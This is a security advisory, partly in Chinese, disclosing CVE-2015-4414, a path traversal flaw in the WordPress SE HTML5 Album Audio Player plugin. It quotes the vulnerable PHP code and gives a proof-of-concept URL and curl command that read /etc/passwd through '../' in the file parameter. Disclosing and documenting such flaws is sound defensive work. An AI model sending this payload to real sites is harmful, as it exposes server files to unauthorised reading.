WordPress SE HTML5 Album Audio Player插件本地文件包含漏洞(

发布日期：2015-06-09
更新日期：2015-06-18

受影响系统：

WordPress SE HTML5 Album Audio Player <= 1.1.0

描述：

---

BUGTRAQ  ID: 75093
CVE(CAN) ID: CVE-2015-4414

SE HTML5 Album Audio Player插件可以在网站上归档、呈现、播放mp3文件或其他HTML5音频格式文件。

SE HTML5 Album Audio Player (se-html5-album-audio-player) 1.1.0及更早版本，download_audio.php在实现上存在目录遍历漏洞，远程攻击者通过file参数内的“..”，利用此漏洞可读取任意文件。

<*来源：Larry W. Cashdollar （[email protected]）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd


Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.

Vulnerability:
The se-html5-album-audio-player v1.1.0  plugin for wordpress has a remote file download vulnerability.  The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.

This vulnerability doesn’t require authentication to the Wordpress site.

File ./se-html5-album-audio-player/download_audio.php:

3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
5 // make sure it's a file before doing anything!
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
7
8        // required for IE
9        if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off');        }
10   
11        // get the file mime type using the file extension
12        switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
13                case 'pdf': $mime = 'application/pdf'; break;
14                case 'zip': $mime = 'application/zip'; break;
15                case 'jpeg':
16                case 'jpg': $mime = 'image/jpg'; break;
17                default: $mime = 'application/force-download';
18        }
19        header('Pragma: public');      // required
20        header('Expires: 0');          // no cache
21        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
22        header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
23        header('Cache-Control: private',false);
24        header('Content-Type: '.$mime);
25        header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
26        header('Content-Transfer-Encoding: binary');       
27        header('Content-Length: '.filesize($file_name));        // provide file size
28        header('Connection: close');
29        readfile($file_name);          // push it out
30        exit();

The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.

CVEID: 2015-4414
OSVDB:
Exploit Code:
  &#8226; $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd

建议：

---

厂商补丁：

WordPress
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://wordpress.org/plugins/se-html5-album-audio-player/